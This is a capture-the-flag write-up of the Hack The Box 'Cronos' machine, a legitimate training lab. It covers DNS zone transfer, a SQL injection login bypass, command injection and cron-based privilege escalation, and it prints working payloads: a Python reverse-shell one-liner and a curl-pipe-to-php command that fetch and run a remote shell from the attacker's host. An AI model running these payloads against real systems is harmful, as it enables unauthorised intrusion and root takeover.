2 min to read
HTB - Cronos Writeup
- Box: Cronos
- Difficulty: Medium
- Points: 30
- Release: 22 Mar 2017
- IP: 10.10.10.13
1. Nmap Scanning
Starting with a scan of the target ip address:
nmap -sC -sV -oA cronos.nmap 10.10.10.13
We see ports 22,53,80 open. First off let’s load up the browser and take a look.
We see a default Apache2 page like this:
Let’s try and find some directories using GoBuster:
gobuster dir -u http://10.10.10.13/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
No results for the GoBuster. In the port scan we saw DNS open so let’s nslookup and see what we can find out about the server.
We got a domain, cronos.htb We’ll go ahead and add that into our hosts file and browse to it.
Running the GoBuster scan again for cronos.htb we see the “robots.txt” file is available but there is nothing of substance available.
Let’s try a zone transfer since port 53 is open and see if we can get any more information:
The admin.cronos.htb looks interesting so let’s add that into our hosts file as well so we can browse to it.
Nice! We got a login page, let’s test a bypass using SQL injection.
admin' or '1'='1
Using the following Pentest Blog Cheat Sheet
We got a Net Tool v0.1 page. Perhaps this is also vulnerable to command injection?
Looks like it!
Now that we confirmed command injection, we can simply use the below command to get a reverse shell in python.
I used this cheat sheet from PentestMonkey.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.57",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We can look at our listener and confirm we got a shell.
Next we need to escalate our privileges.
After investigating the machine we don’t have much luck enumerating.
Based on the name of this box, we take a look at /etc/crontab. Here we see something of interest:
The last line there indicates a file named artisan is being executed by root.
Pulling up the permissions for artisan shows our user has access to edit the file. So let’s simply make a script to have the server download a php reverse shell from my host and pipe it into php to execute.
I used the following PentestMonkey shell.
system('curl http://10.10.14.57/reverse.php | php')
Let’s setup a web server locally and also ensure we have a listener ready to capture the shell.
Wait a minute or so and the cronjob will execute the artisan file and we can see the nc listener now has a shell.
It isn’t a full interactive shell but using the following post we can make it one:
We can find the root flag in /root/root.txt and the user flag at /home/noulis/user.txt.